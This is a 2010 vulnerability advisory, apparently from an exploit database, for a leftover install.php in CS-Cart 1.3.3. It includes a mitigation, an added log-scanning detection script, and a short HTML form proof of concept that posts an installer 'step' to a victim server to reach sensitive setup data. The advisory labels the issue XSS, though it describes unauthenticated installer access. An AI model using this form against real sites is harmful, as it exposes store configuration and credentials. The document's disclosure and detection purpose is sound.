Vendor: CS CART
By: LogicGate
CVSS: 4.3 (MEDIUM)
CWE: 79 (Cross-Site Scripting (XSS))
Product Name: CS CART
Affected Version From: 1.3.3
Affected Version To: 1.3.3
Patch Exists: NO
Related CWE: N/A
CPE: a:cs-cart:cs-cart:1.3.3
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

CS CART 1.3.3 INSTALL.PHP XSS

If 'install.php' is not removed after installation, it remains reachable on the server. An attacker can create an HTML file with a form containing a text input named 'step' and a submit button, with the form action set to the path of the 'install.php' file on the victim server. After opening the HTML file, the attacker can enter any step of the installation they would like to access. Step '3' contains the most sensitive information.

Mitigation:

Remove the 'install.php' file after installation.
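
A detection check to go with the mitigation, as an added example that is not part of the original advisory: it scans combined-format web access logs for requests that reached 'install.php' and were not answered with 404 or 410, which indicates the installer is still deployed. The log format, the function name and the sample lines are assumptions constructed for illustration.

```python
import re

# Apache/nginx "combined" access-log line (assumed format):
# client, identity, user, [timestamp], "request line", status, ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def installer_hits(lines, script="install.php"):
    """Return (client, timestamp, method, path, status) for each request that
    reached the installer script and was not answered with 404 or 410."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        path = m["target"].split("?", 1)[0]
        # Compare the final path segment only, so /shop/install.php matches
        # but /docs/install.php.txt does not.
        if path.rsplit("/", 1)[-1].lower() != script:
            continue
        status = int(m["status"])
        if status in (404, 410):
            continue  # installer already removed: the request found nothing
        # The POSTed 'step' value is in the request body and is not logged,
        # so any answered request to the installer is reported.
        hits.append((m["client"], m["ts"], m["method"], path, status))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Sep/2010:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Sep/2010:10:02:13 +0000] "POST /install.php HTTP/1.1" 200 8342 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Sep/2010:10:02:40 +0000] "POST /shop/install.php HTTP/1.1" 200 9011 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [08/Sep/2010:10:05:00 +0000] "GET /install.php HTTP/1.1" 404 209 "-" "curl/7.21"',
    '192.0.2.10 - - [08/Sep/2010:10:06:00 +0000] "GET /docs/install.php.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, ts, method, path, status in installer_hits(SAMPLE_LOG):
        print(f"{ts} {client} {method} {path} -> {status}")
```

Any hit means the installer is still present under the web root and should be deleted.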

Exploit-DB raw data:

# Exploit Title: [CS CART 1.3.3 INSTALL.PHP XSS]
# Date: [2010-09-08]
# Author: [LogicGate]
# Software Link: [http://cs-cart.smartcode.com/]
# Version: [1.3.3]
# Tested on: [N/A]
# CVE : [N/A]

If "install.php" was not removed after installation, simply make an HTML file with the following code and replace <Victim Server> with the path to "install.php", for example "http://www.nonexistant.com/install.php":

<html>
<form name="installform" method="post" action="http://<Victim Ip>/install.php">
<input type="text" name="step">
<input type="submit" id="nextbut" value="xss">
</form>
</html>

After that, open the HTML file you have just created and enter whichever step of the installation you would like to access. Step "3" is where the juiciest information is.